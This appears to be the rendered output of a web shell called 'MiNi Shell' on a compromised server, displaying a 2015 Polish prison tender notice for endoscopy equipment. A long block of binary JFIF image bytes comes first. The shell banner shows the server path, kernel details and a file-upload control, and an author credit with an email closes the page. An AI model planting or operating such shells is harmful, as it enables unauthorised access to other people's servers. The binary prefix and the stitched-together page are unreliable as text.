JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151211/339192-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Dostawy sprzętu i aparatury medycznej Nr sprawy 19/Szp/2015</b><br>
<b>Numer ogłoszenia: 339192 - 2015; data zamieszczenia: 11.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5855252, 5855303, faks 052 5855300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sprzętu i aparatury medycznej Nr sprawy 19/Szp/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa sprzętu i aparatury medycznej:
 PROCESOR WIZYJNY I ŻRÓDŁO ŚWIATŁA - szt. 1,
 VIDEOGASTROSKOP - szt. 2,
 VIDEOKOLONOSKOP- szt. 1.
 WYPOSAŻENIE DODATKOWE:
 SYSTEM ARCHIWIZACJI BADAŃ ENDOSKOPOWYCH- szt. 1,
 SSAK MEDYCZNY- szt. 1,
 KLESZCZE BIOPSYJNE- szt. 2,
 WÓZEK- szt. 1,
 MONITOR MEDYCZNY - szt. 1
Wymagalne parametry techniczne przez Zamawiającego:
Procesor wizyjny i źródło światła - 1 szt.
Lp.
Parametry techniczne
1Źródło światła - lampa halogen
2Moc Lampy min.150W
3Przetwornik CCD kolor
4Maksymalny czas gotowości urządzenia do badania po włączeniu zasilania do 15 sekund
5Wyostrzenie obrazu w trakcie badania
6Funkcja zatrzymania obrazu głównego z ruchomym obrazem dodatkowym
7Wyjścia wideo: min. RGB, S-VHS
8Lampa zapasowa 
9Metoda pomiaru światła: szczytowa/uśredniona
10Możliwość przypisania dowolnej funkcji procesora do dowolnego przycisku na głowicy sterującej wideoendoskopu (dostępna możliwość zaprogramowania: wyostrzenia obrazu, zamrożenia obrazu, metody pomiaru światła, zapisania obrazu endoskopowego na urządzeniu zewnętrznym, takim jak wideoprinter, komputer PC)
11Wyostrzenie obrazu elektroniczne w min. 3 poziomach
12Regulacja kontrastu w min. 3 zakresach
13Elektroniczne powiększenie obrazu do 2x
14Możliwość wyświetlania obrazu: w lustrzanym odbiciu oraz odwróconego o 180 stopni
15Podłączenie endoskopu do procesora i źródła światła za pomocą jednego konektora
16Kompatybilność z oferowanymi aparatami (wideogastroskopy, wideokolonoskop)
17Źródło światła i pompa insuflacyjna kompatybilne z posiadanymi endoskopami serii FG FC bez użycia dodatkowych adapterów i konektorów łączących
Wideogastroskop - 2 szt.

Lp.
Parametry techniczne
1Pełna zanurzalność endoskopu
2Przetwornik CCD kolor
3Kanał roboczy min. 2,8 mm
4Długość robocza sondy wziernikowej  max. 1050 mm
5Kąt widzenia min. 140 st.
6
Minimalne wychylenie końcówki sondy wziernikowej
góra 210 stopni b) dół 120 stopni 
c) prawo 120 stopni   d) lewo 120 stopni  
7Średnica zewnętrzna sondy 
Wziernikowej max 9,8 mm
8Funkcja identyfikacji endoskopu przez procesor
9Głębia ostrości min. 5-100  mm
10Programowalne przyciski endoskopowe (minimum 3). Możliwość przypisania wszystkich funkcji procesora na dowolny przycisk sterujący endoskopu.
11Rotacja endoskopu we wtyku do procesora wizyjnego w zakresie 180 st.
12Kompatybilność z posiadaną myjnią - dezynfektorem BHT INNOVA E2
13Kompatybilność z oferowanym procesorem wizyjnym 
14System z zastosowaniem zabezpieczenia wtyku z podłączeniem do procesora i źródła światła za pomocą jednego konektora


Wideokolonoskop - 1 szt.
 Lp.Parametry techniczne
1
Pełna zanurzalność endoskopu
2
Przetwornik CCD kolor
3
Kanał roboczy min. 3,8 mm
4
Długość robocza sondy wziernikowej min 1500 mm
5
Kąt widzenia min 140st.
6
Minimalne wychylenie końcówki sondy wziernikowej
góra 180 stopni  b) dół 180 stopni 
c) prawo 160 stopni  d) lewo 160 stopni 
7
Średnica zewnętrzna sondy 
wziernikowej max 13,2 mm
8
Funkcja identyfikacji endoskopu przez procesor
9
Głębia ostrości min. 3-100 mm
10
Programowalne przyciski endoskopowe (minimum 3). Możliwość przypisania wszystkich funkcji procesora na dowolny przycisk sterujący endoskopu.
11
Zróżnicowana gibkość tuby wziernikowej (stała lub regulowana) 
12
Rotacja endoskopu we wtyku do procesora wizyjnego w zakresie 180st.
13
Kompatybilność z oferowanym procesorem wizyjnym 
14
Kompatybilność z posiadaną myjnią - dezynfektorem BHT INNOVA E2
15
System z zastosowaniem zabezpieczenia wtyku z podłączeniem do procesora i źródła światła za pomocą jednego konektora






System archiwizacji badań endoskopowych


 Lp.
Parametry techniczne
1
Oprogramowanie komputerowe umożliwiające archiwizację danych z badań endoskopowych  z oferowanego zestawu endoskopowego 
2
Przenośny zestaw komputerowy (laptop) o parametrach zapewniających stabilną pracę systemu 
3
Drukarka laserowa (kolorowa) 
4
pojemność dysku twardego dla każdego zestawu min.500 GB
5
Możliwość sporządzania, drukowania i archiwizacji raportów z badania zawierających opis badania, dokumentację fotograficzną i dane pacjenta
6
Możliwość rejestracji obrazów i sekwencji wideo w trybie jedno i dwu podglądowym na jednym monitorze użytkownika (np. procedura EUS lub ERCP)
7
Możliwość wprowadzenia użytkowników z delegacją uprawnień dla każdego użytkownika, ustawienia na hasło
8
Możliwość tworzenia szablonów raportów (wklejanie części zapisanych wcześniej opisów)
możliwość zapisu z poziomu programu zdjęć w formatach: .bmp, .jpg, .gif
9
Baza kodów ICD9 i ICD10
10
Możliwość sterowania zapisem zdjęć i sekwencji wideo z dowolnego przycisku na  głowicy endoskopu na dysk komputera 







Ssak medyczny - 1 szt.



 Lp.
Parametry techniczne
1
Pompa próżniowa bezolejowa
2
Masa max.5,6 kg
3
Przepływ min. 30 l/min.
4
Maks. podciśnienie 82 kPa
5
Głośność max. 45 dB
6
Zasilanie sieciowe 230V, 50/60 Hz
7
Przewód zasilający o długości min. 3 m
8
Praca ciągła 24 godziny na dobę



Kleszcze biopsyjne - 2 szt.

 Lp.
Parametry techniczne
1
Kleszcze biopsyjne wielorazowe (autoklawowalne) przystosowane do kanału roboczego min. 2,8 mm. Długość narzędzia 230 cm.




Wózek medyczny - 1 szt.

 Lp.
Parametry techniczne
1
Podstawa jezdna z blokadą kół
2
Wieszak na endoskop
3
Możliwość ustawienia całego zestawu endoskopowego
4
Obrotowe ramię do monitora medycznego
5
Szuflada na klawiaturę




Monitor medyczny - 1 szt.

Lp.
Parametry techniczne
1
Min 19 cali
2
Matryca LCD 
3
Rozdzielczość min 1280x1024
4
Kąt widzenia min 160 x 160 stopni
5
Wejścia min DVI, Y/C, RGBS

Przedstawione powyżej parametry są parametrami granicznymi, których niespełnienie spowoduje odrzucenie oferty. Brak nawet jednego z w/w wymagań będzie traktowany jako brak danego parametru w oferowanej konfiguracji urządzenia i spowoduje odrzucenie oferty na podstawie art. 89 ust.1 pkt 2 ustawy Pzp.


Wymagania stawiane przez Zamawiającego:

1)
Oferowane endoskopy  muszą współpracować z posiadaną  przez Zamawiającego myjką endoskopową firmy BHTHYGIENE TECHNIK GMBH Typ INNOVA E 2 rok produkcji 2004, posiadane przyłącze do endoskopów firmy Pentax
2)
Sprzęt objęty przedmiotem zamówienia musi ze sobą współpracować, 
3)
Oferent zapewni pełną bezpłatną obsługę serwisową oferowanego sprzętu w tym bezpłatną naprawę uszkodzeń niegwarancyjnych przez okres min 24 miesięcy
4)
Wykonawca gwarantuje czas reakcji swojego autoryzowanego serwisu maksymalnie do 3 dni roboczych od chwili zgłoszenia usterki przez zamawiającego 
5)
Autoryzowany serwis gwarancyjny i pogwarancyjny na  terenie  Polski  (dotyczy sprzętu)

Wszystkie zamawiane urządzenia muszą być zgodne z normami dopuszczającymi je do obrotu i używania zgodnie z aktualna ustawą o wyrobach medycznych. Do oferty załączyć odpowiednie dokumenty lub oświadczenia.
W celu sprawdzenia przez Zamawiającego spełnienia stawianych warunków i wymogów zamieszczonych w opisie przedmiotu zamówienia, należy dołączyć do oferty podpisaną dokumentację, w której zawarta będzie szczegółowa specyfikacja dotycząca oferowanego sprzętu, aparatury medycznej. Do oferty należy dołączyć: oryginalne ilustrowane foldery producenta z potwierdzonymi wymaganymi wyżej parametrami technicznymi wyrobów, instrukcję obsługi w języku polskim (dane techniczne urządzenia, wymiary, z jakich elementów się składa, prospekty, warunki serwisowania, gwarancji, że oferowany sprzęt jest fabrycznie nowym urządzeniem).  

Miejsce, sposób, terminy dostaw oraz forma i termin płatności:

- Dostawy w/w sprzętu i aparatury medycznej będącej przedmiotem niniejszego zamówienia należy dostarczyć do wskazanego miejsca zlokalizowanego na terenie Aresztu Śledczego w Bydgoszczy.

- Wykonawca dostarczać będzie dany przedmiot zamówienia własnym transportem, na swój koszt, zgodnie z warunkami transportowymi określonymi przez producenta urządzenia.

- Dostarczany przedmiot zamówienia winien być dostarczony w zamkniętych i nieuszkodzonych opakowaniach, odbiór potwierdzony pisemnie przez przedstawiciela wyznaczonego przez Zamawiającego.
- Realizacja dostaw w uzgodnionych terminach, w godzinach 7:00 - 15:00.
- Termin płatności: zgodnie z umową ( załącznik nr 5 do SIWZ) nie później niż do 31.12.2015r., forma płatności: przelew.


2. Integralną częścią opisu przedmiotu zamówienia są postanowienia zawarte we wzorze umowy, który stanowi załącznik do specyfikacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie: podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz) oraz dokumentów jakie mają dołączyć wykonawcy, o których mowa w siwz rozdział VI</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie: podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz) oraz dokumentów jakie mają dołączyć wykonawcy, o których mowa w siwz rozdział VI</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie: podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz) oraz dokumentów jakie mają dołączyć wykonawcy, o których mowa w siwz rozdział VI</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie: podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz) oraz dokumentów jakie mają dołączyć wykonawcy, o których mowa w siwz rozdział VI</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie: podpisanego oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do siwz) oraz dokumentów jakie mają dołączyć wykonawcy, o których mowa w siwz rozdział VI</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Walory kliniczne - 20</li>
<li>3 - Serwis - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy, ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 08:00, miejsce: Areszt Śledczy - Sekretariat, ul. Wały Jagiellońskie 4, 85-128 Bydgoszcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com